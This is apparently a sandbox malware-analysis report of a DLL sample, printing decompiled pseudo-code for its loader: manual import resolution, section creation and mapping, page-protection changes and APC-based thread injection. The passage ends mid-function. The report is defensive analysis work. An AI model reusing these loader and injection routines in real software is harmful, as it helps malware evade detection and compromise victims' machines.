Instruction Fuzzy Hash: D1219AB6A00218BBF701EFA4CCC8EDE77ADEB482D0F118126FA15D7198DA3099458B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001BA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E10001BA8(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E10001D37(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x10001bb1
0x10001bb8
0x10001bb9
0x10001bba
0x10001bbb
0x10001bbc
0x10001bcd
0x10001bd1
0x10001be5
0x10001be8
0x10001beb
0x10001bf2
0x10001bf5
0x10001bfc
0x10001bff
0x10001c02
0x10001c05
0x10001c0a
0x10001c45
0x10001c0c
0x10001c0f
0x10001c15
0x10001c1a
0x10001c1e
0x10001c3c
0x10001c20
0x10001c27
0x10001c35
0x10001c35
0x10001c1e
0x10001c4d

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 10001C05

Part of subcall function 10001D37: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001C1A,00000002,00000000,?,?,00000000,?,?,10001C1A,00000002), ref: 10001D64

memset.NTDLL ref: 10001C27

Strings

@, xrefs: 10001BF5

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 12b302ca17cd3473f9f6b427f887b83274cf68790ff5bf5eced54f4a6f8076a2
Instruction ID: 00088b6872129372a720b4550569c3bc7188c3c17d5f766ef30f01d2277fb779
Opcode Fuzzy Hash: 12b302ca17cd3473f9f6b427f887b83274cf68790ff5bf5eced54f4a6f8076a2
Instruction Fuzzy Hash: 1E211DB5D00209AFDB11CFA9C8849DEFBF9EF48354F10842AE555F3210D731AA458B60

Uniqueness

Uniqueness Score: -1.00%

Function 100015BD Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100015BD(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr* _v12;
				_Unknown_base(*)()** _v16;
				signed int _v20;
				signed short _v24;
				struct HINSTANCE__* _v28;
				intOrPtr _t43;
				intOrPtr* _t45;
				intOrPtr _t46;
				struct HINSTANCE__* _t47;
				intOrPtr* _t49;
				intOrPtr _t50;
				signed short _t51;
				_Unknown_base(*)()* _t53;
				CHAR* _t54;
				_Unknown_base(*)()* _t55;
				void* _t58;
				signed int _t59;
				_Unknown_base(*)()* _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				signed int _t68;
				void* _t69;
				CHAR* _t71;
				signed short* _t73;

				_t69 = __edi;
				_v20 = _v20 & 0x00000000;
				_t59 =  *0x100041c0;
				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
				if(_t43 != 0) {
					_t45 = _t43 + __edi;
					_v12 = _t45;
					_t46 =  *((intOrPtr*)(_t45 + 0xc));
					if(_t46 != 0) {
						while(1) {
							_t71 = _t46 + _t69;
							_t47 = LoadLibraryA(_t71); // executed
							_v28 = _t47;
							if(_t47 == 0) {
								break;
							}
							_v24 = _v24 & 0x00000000;
							 *_t71 = _t59 - 0x69b25f44;
							_t49 = _v12;
							_t61 =  *((intOrPtr*)(_t49 + 0x10));
							_t50 =  *_t49;
							if(_t50 != 0) {
								L6:
								_t73 = _t50 + _t69;
								_v16 = _t61 + _t69;
								while(1) {
									_t51 =  *_t73;
									if(_t51 == 0) {
										break;
									}
									if(__eflags < 0) {
										__eflags = _t51 - _t69;
										if(_t51 < _t69) {
											L12:
											_t21 =  &_v8;
											 *_t21 = _v8 & 0x00000000;
											__eflags =  *_t21;
											_v24 =  *_t73 & 0x0000ffff;
										} else {
											_t65 = _a4;
											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
												goto L12;
											} else {
												goto L11;
											}
										}
									} else {
										_t51 = _t51 + _t69;
										L11:
										_v8 = _t51;
									}
									_t53 = _v8;
									__eflags = _t53;
									if(_t53 == 0) {
										_t54 = _v24 & 0x0000ffff;
									} else {
										_t54 = _t53 + 2;
									}
									_t55 = GetProcAddress(_v28, _t54);
									__eflags = _t55;
									if(__eflags == 0) {
										_v20 = _t59 - 0x69b25ec5;
									} else {
										_t68 = _v8;
										__eflags = _t68;
										if(_t68 != 0) {
											 *_t68 = _t59 - 0x69b25f44;
										}
										 *_v16 = _t55;
										_t58 = 0x593682f4 + _t59 * 4;
										_t73 = _t73 + _t58;
										_t32 =  &_v16;
										 *_t32 = _v16 + _t58;
										__eflags =  *_t32;
										continue;
									}
									goto L23;
								}
							} else {
								_t50 = _t61;
								if(_t61 != 0) {
									goto L6;
								}
							}
							L23:
							_v12 = _v12 + 0x14;
							_t46 =  *((intOrPtr*)(_v12 + 0xc));
							if(_t46 != 0) {
								continue;
							} else {
							}
							L26:
							goto L27;
						}
						_t60 = _t59 + 0x964da13a;
						__eflags = _t60;
						_v20 = _t60;
						goto L26;
					}
				}
				L27:
				return _v20;
			}

0x100015bd
0x100015c6
0x100015cb
0x100015d1
0x100015da
0x100015e0
0x100015e2
0x100015e5
0x100015ea
0x100015f1
0x100015f1
0x100015f5
0x100015fb
0x10001600
0x00000000
0x00000000
0x10001606
0x10001610
0x10001612
0x10001615
0x10001618
0x1000161c
0x10001624
0x10001626
0x10001629
0x10001691
0x10001691
0x10001695
0x00000000
0x00000000
0x1000162e
0x10001634
0x10001636
0x10001649
0x1000164c
0x1000164c
0x1000164c
0x10001650
0x10001638
0x10001638
0x10001640
0x10001642
0x00000000
0x00000000
0x00000000
0x00000000
0x10001642
0x10001630
0x10001630
0x10001644
0x10001644
0x10001644
0x10001653
0x10001656
0x10001658
0x1000165f
0x1000165a
0x1000165a
0x1000165a
0x10001667
0x1000166d
0x1000166f
0x1000169f
0x10001671
0x10001671
0x10001674
0x10001676
0x1000167e
0x1000167e
0x10001683
0x10001685
0x1000168c
0x1000168e
0x1000168e
0x1000168e
0x00000000
0x1000168e
0x00000000
0x1000166f
0x1000161e
0x1000161e
0x10001622
0x00000000
0x00000000
0x10001622
0x100016a2
0x100016a2
0x100016a9
0x100016ae
0x00000000
0x00000000
0x100016b4
0x100016bf
0x00000000
0x100016bf
0x100016b6
0x100016b6
0x100016bc
0x00000000
0x100016bc
0x100015ea
0x100016c0
0x100016c5

APIs

LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 100015F5
GetProcAddress.KERNEL32(?,00000000), ref: 10001667

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID:
API String ID: 2574300362-0
Opcode ID: c73d64e7241367c909f9d4a54863225bb38c84707918000ebbfbb5305d6b2a3e
Instruction ID: 8d700e182ac45b2932372c765a9e49b7f5ca49348ab59e073656ca111a4c7910
Opcode Fuzzy Hash: c73d64e7241367c909f9d4a54863225bb38c84707918000ebbfbb5305d6b2a3e
Instruction Fuzzy Hash: 3E313775A01206DBEB50CF59CC94AEEB7F8FF04394F29416AD841EB218EB72DA40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10001D37 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E10001D37(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x10001d49
0x10001d4f
0x10001d5d
0x10001d64
0x10001d69
0x10001d6f
0x00000000
0x10001d70
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,10001C1A,00000002,00000000,?,?,00000000,?,?,10001C1A,00000002), ref: 10001D64

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 7b41d3e74b2e677c32c7d0ca4fa4e60a7a7e62236049e6e6795ded9ddfdc5342
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: E9F030B690460CFFEB119FA5DC85CDFBBBDEB44394B10893AF552E1094D6309E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001D80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x10004188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x1000418c;
						if( *0x1000418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x10004198;
								if( *0x10004198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x1000418c);
						}
						HeapDestroy( *0x10004190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x10004188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						 *0x10004190 = _t18;
						_t41 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x100041b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E100016C8(E1000177A, E10001726(_a12, 1, 0x10004198, _t41));
							 *0x1000418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}

0x10001d83
0x10001d8f
0x10001d91
0x10001d94
0x10001e0a
0x10001e10
0x10001e12
0x10001e14
0x10001e1a
0x10001e1c
0x10001e21
0x10001e24
0x10001e2f
0x10001e31
0x00000000
0x00000000
0x10001e33
0x10001e36
0x10001e38
0x00000000
0x00000000
0x00000000
0x10001e38
0x10001e40
0x10001e40
0x10001e4c
0x10001e4c
0x10001d96
0x10001d97
0x10001db7
0x10001dbd
0x10001dc2
0x10001dc4
0x10001e00
0x10001e00
0x10001dc6
0x10001dce
0x10001dd5
0x10001ddf
0x10001deb
0x10001df0
0x10001df7
0x10001dfc
0x00000000
0x10001dfc
0x10001df7
0x10001dc4
0x10001d97
0x10001e59

APIs

InterlockedIncrement.KERNEL32(10004188), ref: 10001DA2
HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001DB7

Part of subcall function 100016C8: CreateThread.KERNELBASE ref: 100016DF
Part of subcall function 100016C8: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 100016F4
Part of subcall function 100016C8: GetLastError.KERNEL32(00000000), ref: 100016FF
Part of subcall function 100016C8: TerminateThread.KERNEL32(00000000,00000000), ref: 10001709
Part of subcall function 100016C8: CloseHandle.KERNEL32(00000000), ref: 10001710
Part of subcall function 100016C8: SetLastError.KERNEL32(00000000), ref: 10001719

InterlockedDecrement.KERNEL32(10004188), ref: 10001E0A
SleepEx.KERNEL32(00000064,00000001), ref: 10001E24
CloseHandle.KERNEL32 ref: 10001E40
HeapDestroy.KERNEL32 ref: 10001E4C

Strings

Tqt, xrefs: 10001DB7

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
String ID: Tqt
API String ID: 2110400756-564558472
Opcode ID: 777a8ee8cc7f1ab42597412b85aa3565cef900f2f4af315bfc25d727a8b774d6
Instruction ID: c8539d468d94060839540aa5479e0f5b4435c67910b5dfceee9ca69edcf68661
Opcode Fuzzy Hash: 777a8ee8cc7f1ab42597412b85aa3565cef900f2f4af315bfc25d727a8b774d6
Instruction Fuzzy Hash: FE216FB1501256EBF701DFA9CCC4ACE7BE8E7596E47528029FA05D3158DA309D408BA4

Uniqueness

Uniqueness Score: -1.00%

Function 100016C8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E100016C8(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x100041c0, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x100016df
0x100016e5
0x100016e9
0x100016f4
0x100016fc
0x10001705
0x10001709
0x10001710
0x10001717
0x10001719
0x1000171f
0x100016fc
0x10001723

APIs

CreateThread.KERNELBASE ref: 100016DF
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 100016F4
GetLastError.KERNEL32(00000000), ref: 100016FF
TerminateThread.KERNEL32(00000000,00000000), ref: 10001709
CloseHandle.KERNEL32(00000000), ref: 10001710
SetLastError.KERNEL32(00000000), ref: 10001719

Strings

@Mqt`fqt MqtTqt, xrefs: 100016FF

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID: @Mqt`fqt MqtTqt
API String ID: 3832013932-883350353
Opcode ID: d7fb2e9932fcc271152d8e7e4fa523731d3d29fc76947d590bd7daf8ce067e52
Instruction ID: 1ca867a484479c44341c16693bc214407169365f074fec1cd2b74c0c39f1c3fd
Opcode Fuzzy Hash: d7fb2e9932fcc271152d8e7e4fa523731d3d29fc76947d590bd7daf8ce067e52
Instruction Fuzzy Hash: 0AF0F83260A631EBF3139BA18C98F9FBFADFB087D1F018404F645D5168CB3198118BA5

Uniqueness

Uniqueness Score: -1.00%

Function 10001A9E Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10001A9E(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001911(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x100041c4 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x100041c4 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E100020CA(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x100041c4 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x100041c4 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x100041c4 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x100041c4 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E10001BA8(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x10001aac
0x10001ab0
0x10001b71
0x10001ab6
0x10001ace
0x10001add
0x10001ae4
0x10001ae6
0x10001aeb
0x10001b69
0x10001b6a
0x10001aed
0x10001afa
0x10001afc
0x10001b01
0x00000000
0x10001b03
0x10001b10
0x10001b12
0x10001b17
0x00000000
0x10001b19
0x10001b26
0x10001b28
0x10001b2d
0x00000000
0x10001b2f
0x10001b3c
0x10001b3e
0x10001b43
0x00000000
0x10001b45
0x10001b4b
0x10001b51
0x10001b56
0x10001b5b
0x10001b60
0x00000000
0x10001b62
0x10001b65
0x10001b65
0x10001b60
0x10001b43
0x10001b2d
0x10001b17
0x10001b01
0x10001aeb
0x10001b7f

APIs

Part of subcall function 10001911: RtlAllocateHeap.NTDLL(00000000,?,10001027,00000030,747163F0,00000000), ref: 1000191D

GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001824,?,?,?,?,?,00000002,?,?), ref: 10001AC2
GetProcAddress.KERNEL32(00000000,?), ref: 10001AE4
GetProcAddress.KERNEL32(00000000,?), ref: 10001AFA
GetProcAddress.KERNEL32(00000000,?), ref: 10001B10
GetProcAddress.KERNEL32(00000000,?), ref: 10001B26
GetProcAddress.KERNEL32(00000000,?), ref: 10001B3C

Part of subcall function 10001BA8: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 10001C05
Part of subcall function 10001BA8: memset.NTDLL ref: 10001C27

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 8a2f1540afad0b39173d63cd339439955c438be004b8e187e025791affd0ecf9
Instruction ID: aeed8c60f4c6c4dfd291128c0b5e5348fda47a69ecb75380528b69584e70c319
Opcode Fuzzy Hash: 8a2f1540afad0b39173d63cd339439955c438be004b8e187e025791affd0ecf9
Instruction Fuzzy Hash: 52216DB060470AEFE711CF6ACC90D9BB7ECEF542C4B024166E904C7299EB75E9048B64

Uniqueness

Uniqueness Score: -1.00%

Function 100012D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E100012D9(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x100041c0;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x100012e3
0x100012f0
0x100012f6
0x10001302
0x10001312
0x10001314
0x1000131c
0x100013b1
0x100013b8
0x00000000
0x00000000
0x00000000
0x10001322
0x10001322
0x10001322
0x10001326
0x00000000
0x00000000
0x10001332
0x10001336
0x1000135a
0x1000135e
0x10001372
0x10001372
0x10001378
0x10001387
0x1000138b
0x10001393
0x10001393
0x1000139b
0x1000139e
0x100013ab
0x00000000
0x00000000
0x00000000
0x00000000
0x100013ab
0x10001366
0x1000136a
0x10001370
0x00000000
0x00000000
0x00000000
0x10001370
0x1000133e
0x10001342
0x1000134c
0x10001344
0x10001344
0x10001344
0x00000000
0x10001342
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001312
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 10001387
GetLastError.KERNEL32 ref: 1000138D

Strings

@Mqt`fqt MqtTqt, xrefs: 1000138D

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: ProtectVirtual$ErrorLast
String ID: @Mqt`fqt MqtTqt
API String ID: 1469625949-883350353
Opcode ID: 4c6f76a54fdfd7f26da9aff2d1939d549df30021f47062ca99b34fc8fcf84894
Instruction ID: e536b5322607c382a6ddd3697f788c3c497bec8696bc99740b1beb28151d930e
Opcode Fuzzy Hash: 4c6f76a54fdfd7f26da9aff2d1939d549df30021f47062ca99b34fc8fcf84894
Instruction Fuzzy Hash: 8F217C7180030AEFDB14CF85C885AEAF7F8FF08394F014459D602D7458E7B4AA65CB94

Uniqueness

Uniqueness Score: -1.00%

Function 1000177A Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E1000177A(void* __ecx, char _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E10001000(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x10001783
0x10001788
0x10001796
0x1000179b
0x1000179b
0x100017a1
0x100017a6
0x100017aa
0x100017ae
0x100017ae
0x100017b8
0x100017c1

APIs

GetCurrentThread.KERNEL32 ref: 1000177D
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 10001788
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 1000179B
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 100017AE

Memory Dump Source

Source File: 00000000.00000002.817665590.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.817652305.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817676831.0000000010003000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817690385.0000000010005000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.817699078.0000000010006000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: a32e656a30f9f18aeda524b54fd9a3e63e948092552140b27e7343140b1d9fb5
Instruction ID: 40a45fa8fd192cfb829952fbe4e921b3fe8ae02101d4ce2bbb823fcff26e83b0
Opcode Fuzzy Hash: a32e656a30f9f18aeda524b54fd9a3e63e948092552140b27e7343140b1d9fb5
Instruction Fuzzy Hash: 69E0927120A3212BF2126B294CD4FAB67ACEF823F17024325F524D22E8CF548C0585A5

Uniqueness

Uniqueness Score: -1.00%

Function 100017E8 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 70
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E100017E8(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x100041c0;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x100041c0 - 0x69b24f45 &  !( *0x100041c0 - 0x69b24f45);
